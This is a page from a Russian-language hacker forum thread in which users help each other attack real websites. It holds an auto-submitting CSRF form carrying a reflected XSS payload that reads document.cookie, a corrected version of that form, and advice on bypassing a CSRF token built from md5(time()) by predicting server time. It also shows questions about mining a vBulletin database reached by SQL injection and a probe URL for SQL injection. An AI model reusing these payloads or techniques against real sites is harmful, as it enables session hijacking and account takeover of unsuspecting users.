Старый 22.10.2011, 09:01   #1431
tipsy
 
Аватар для tipsy
 
Регистрация: 10.07.2010
Сообщений: 415
Репутация: 311
По умолчанию

А это не фэйк? Что-то верится с трудом.
tipsy вне форума   Ответить с цитированием
Старый 22.10.2011, 15:55   #1432
dumb
 
Регистрация: 01.10.2011
Сообщений: 63
Репутация: 1
По умолчанию

Цитата:
Сообщение от dumb Посмотреть сообщение
Как из бд VBulletin'a достать адрес ресурса(форума)? А то есть скуля, таблицы булки в бд, но форума и п близости нету =\
А для OpenX 2.8.7 нет такой возможности?
Есть таблица ox_banners - показывает имена баннеров без путей и ссылки на которые они ведут, но путей нигде нет... =\
dumb вне форума   Ответить с цитированием
Старый 22.10.2011, 17:24   #1433
M1lten
 
Регистрация: 02.12.2010
Сообщений: 40
Репутация: -1
По умолчанию

Привет. Я нашел пассивную xss, в пост запросе. Для того что бы выполнить js нужно нажать сабмит. Раньше сталкивался, проблем не было никаких, но вот не пойму что в моей форме не так? Автоматически сабмит не жметься. А когда получалось, то форма на сайт не передавалась

PHP код:
<form name="asd" method="post" action="http://site.com/edit.php">
<
input type="hidden" name="submitted" value="1">

<
tbody>
<
tr>
<
tr>
    <
td><label>Email:</label></td>
    <
td><input name="email" size="30" type="text" value="mail@mail.ru"></td></br>
</
tr>
<
tr>
    <
td><label>ICQ:</label></td>
    <
td><input name="icq" size="30" type="text" value='"><script>alert(document.cookie)</script>'></td></br>


<
tr><td colspan=2><hr></tr>
<
tr>
    <
td><label>Enter your old password:</label></td></br>
    <
td><input name="old" size="30" type="password"></td></br>
</
tr>
<
tr><td><button type="submit" name="submit" class="btn">Save changes</button></td>
<
script>
document.asd.submit();
</script> 
Зы Оставил полное визуальное содержание, для удобства, мб кому легче будет)
M1lten вне форума   Ответить с цитированием
Старый 22.10.2011, 17:37   #1434
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

</form>
Pashkela вне форума   Ответить с цитированием
Старый 22.10.2011, 17:39   #1435
z0mbie
 
Регистрация: 05.08.2010
Сообщений: 68
Репутация: 0
По умолчанию

Цитата:
Сообщение от M1lten Посмотреть сообщение
Привет. Я нашел пассивную xss, в пост запросе. Для того что бы выполнить js нужно нажать сабмит. Раньше сталкивался, проблем не было никаких, но вот не пойму что в моей форме не так? Автоматически сабмит не жметься. А когда получалось, то форма на сайт не передавалась



Зы Оставил полное визуальное содержание, для удобства, мб кому легче будет)
Код:
<html><body onload="document.forms['asd'].submit();">
<form name="asd" method="post" action="http://site.com/edit.php">
<input type="hidden" name="submitted" value="1">
<body>
<tr>
<tr>
    <td><label>Email:</label></td>
    <td><input name="email" size="30" type="text" value="mail@mail.ru"></td></br>
</tr>
<tr>
    <td><label>ICQ:</label></td>
    <td><input name="icq" size="30" type="text" value='"><script>alert(document.cookie)</script>'></td></br>
<tr><td colspan=2><hr></tr>
<tr>
    <td><label>Enter your old password:</label></td></br>
    <td><input name="old" size="30" type="password"></td></br>
</tr>
<tr><td><button type="submit" name="asd" class="btn">Save changes</button></td>

</body></html>
http://savepic.su/421509.png
z0mbie вне форума   Ответить с цитированием
Старый 22.10.2011, 18:34   #1436
M1lten
 
Регистрация: 02.12.2010
Сообщений: 40
Репутация: -1
По умолчанию

Спасибо, разобрался. Проблема была в token, что я здесь не указал..

Можно ли как-то обойти:
Цитата:
$token = md5(time());
<form method="POST">
<input type="hidden" name="token" value="<?php echo $token; ?>" />

....
Как можно обойти, этот token ? Без правильного значения, не выполнить xss.
Или тут просто нужно генерировать время атаки(угадывать)?
M1lten вне форума   Ответить с цитированием
Старый 22.10.2011, 19:49   #1437
z0mbie
 
Регистрация: 05.08.2010
Сообщений: 68
Репутация: 0
По умолчанию

Цитата:
Сообщение от M1lten Посмотреть сообщение
Спасибо, разобрался. Проблема была в token, что я здесь не указал..

Можно ли как-то обойти:

Как можно обойти, этот token ? Без правильного значения, не выполнить xss.
Или тут просто нужно генерировать время атаки(угадывать)?
http://forum.antichat.ru/thread273030.html
z0mbie вне форума   Ответить с цитированием
Старый 22.10.2011, 21:08   #1438
M1lten
 
Регистрация: 02.12.2010
Сообщений: 40
Репутация: -1
По умолчанию

z0mbie, спасибо за ссылку, полезная инфа.
Только вот что бы я мог провести xss, мне нужен token


У меня есть форма редактирования профиля.
В ней есть уязвимое поле. Вводим туда js жмем сабмит, и все норм. Но если сделать форму, как показано выше, и жертва зайдет на него, у нее ничего не произойдет. Т.к. для сохранения профиля, какраз таки и нужен токен
M1lten вне форума   Ответить с цитированием
Старый 23.10.2011, 10:44   #1439
d0znpp
 
Аватар для d0znpp
 
Регистрация: 09.09.2010
Сообщений: 484
Репутация: 252
По умолчанию

PHP код:
$token md5(time());
//time() - это время в секундах. 
А куда оно потом записывается, как его сервер проверяет?
Очень не верю, что он сколько токенов хранит, в базе.
Скорее в сессию записывает.
Проверь, как привязывается токен к запросу. Может там токен только один на все формы (запросы).
То есть примерно так:
PHP код:
$_SESSION['token']=md5($time); 
Тогда ты можешь переписать переменную своим вторым запросам, время которого будешь знать.
Второй запрос послать можно через XHR, скажем.
В итоге у тебя будет немного вариантов токена - в пределах 2-3 секунд, то есть два-три токена.
Также синкайся с таймзоной и временем сервера, которое он тебе возвращает в HTTP ответе.
__________________
The Sucks Origin Policy
d0znpp вне форума   Ответить с цитированием
Старый 26.10.2011, 20:28   #1440
durito
 
Регистрация: 02.03.2011
Сообщений: 76
Репутация: 2
По умолчанию

http://www.***.com/index.php?list=searchadv%27&method=modify_form

вот просто интересно из этого что-то можно выкружить

Последний раз редактировалось Twost; 17.05.2013 в 13:22..
durito вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot